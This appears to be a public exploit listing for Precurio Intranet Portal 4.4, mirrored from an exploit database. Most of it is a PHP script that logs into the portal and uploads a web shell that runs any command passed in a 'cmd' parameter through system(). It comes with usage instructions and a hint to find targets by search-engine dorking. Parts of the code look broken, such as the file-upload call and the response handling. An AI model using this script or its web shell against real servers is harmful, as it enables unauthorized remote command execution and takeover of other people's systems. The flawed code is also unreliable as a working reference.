Share
## https://sploitus.com/exploit?id=PACKETSTORM:215644
=============================================================================================================================================
    | # Title     : Precurio Intranet Portal 4.4 shell upload Vulnerability                                                                     |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
    | # Vendor    : https://www.precurio.com                                                                                                    |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking ฤฐn Google Or Other Search Enggine.
    
    [+] Code Description: The script performs an attack on a website's control panel by exploiting CSRF vulnerabilities and uploading a shell via the website's administrative interface.
    
       (Related : https://packetstorm.news/files/id/189604/ Related CVE numbers:  ) .
    	
    [+] save code as poc.php.
    
    [+] Usage: php script.php <url> <username> <password>
    
    [+] PayLoad :
    
    <?php
    
    function simulate_login($session, $url, $username, $password) {
        try {
            echo "Logging in...\n";
            sleep(1);
            $login_url = "{$url}/public/default/login/submit";
            $headers = [
                "User-Agent" => "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0",
                "Content-Type" => "application/x-www-form-urlencoded"
            ];
            $data = [
                "username" => $username,
                "password" => $password
            ];
    
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $login_url);
            curl_setopt($ch, CURLOPT_POST, true);
            curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
            curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            $response = curl_exec($ch);
            curl_close($ch);
    
            if (strpos($response, "Welcome System") !== false) {
                echo "Login Successful!\n";
                sleep(1);
                return true;
            } else {
                echo "Login Failed!\n";
                return false;
            }
        } catch (Exception $e) {
            echo "An error occurred during login: {$e->getMessage()}\n";
            return false;
        }
    }
    
    function upload_file($session, $url) {
        try {
            echo "Shell Preparing...\n";
            sleep(1);
            $upload_url = "{$url}/public/user/profile/update";
            $random_filename = substr(str_shuffle("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"), 0, 5) . ".php";
            $file_content = '<html><body><form method="GET" name="<?php echo basename($_SERVER[\'PHP_SELF\']); ?>"><input type="TEXT" name="cmd" autofocus id="cmd" size="80"><input type="SUBMIT" value="Execute"></form><pre><?php if(isset($_GET[\'cmd\'])){ system($_GET[\'cmd\']); } ?></pre></body></html>';
    
            $file = [
                "profile_pic" => new CURLFile('php://temp', 'image/jpeg', $file_content)
            ];
    
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $upload_url);
            curl_setopt($ch, CURLOPT_POST, true);
            curl_setopt($ch, CURLOPT_POSTFIELDS, ['profile_pic' => new CURLFile($file_content)]);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            $response = curl_exec($ch);
            curl_close($ch);
    
            echo "Upload Response Status: " . (isset($response['status_code']) ? $response['status_code'] : "unknown") . "\n";
    
            if (strpos($response, ".php") !== false) {
                $path = extract_php_path($response);
                echo "Your shell is ready: {$url}/{$path}\n";
            } else {
                echo "Exploit Failed!\n";
                echo substr($response, 0, 500) . "\n";
            }
        } catch (Exception $e) {
            echo "An error occurred during file upload: {$e->getMessage()}\n";
        }
    }
    
    function extract_php_path($html_content) {
        if (preg_match('/src="([^"]+\.php)"/', $html_content, $matches)) {
            return $matches[1];
        }
        return "Path not found";
    }
    
    if ($argc != 4) {
        echo "Usage: php script.php <url> <username> <password>\n";
        exit(1);
    }
    
    $url = $argv[1];
    $username = $argv[2];
    $password = $argv[3];
    
    $session = curl_init();
    
    if (simulate_login($session, $url, $username, $password)) {
        upload_file($session, $url);
    } else {
        echo "Cannot proceed without a valid login.\n";
    }
    ?>
    
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================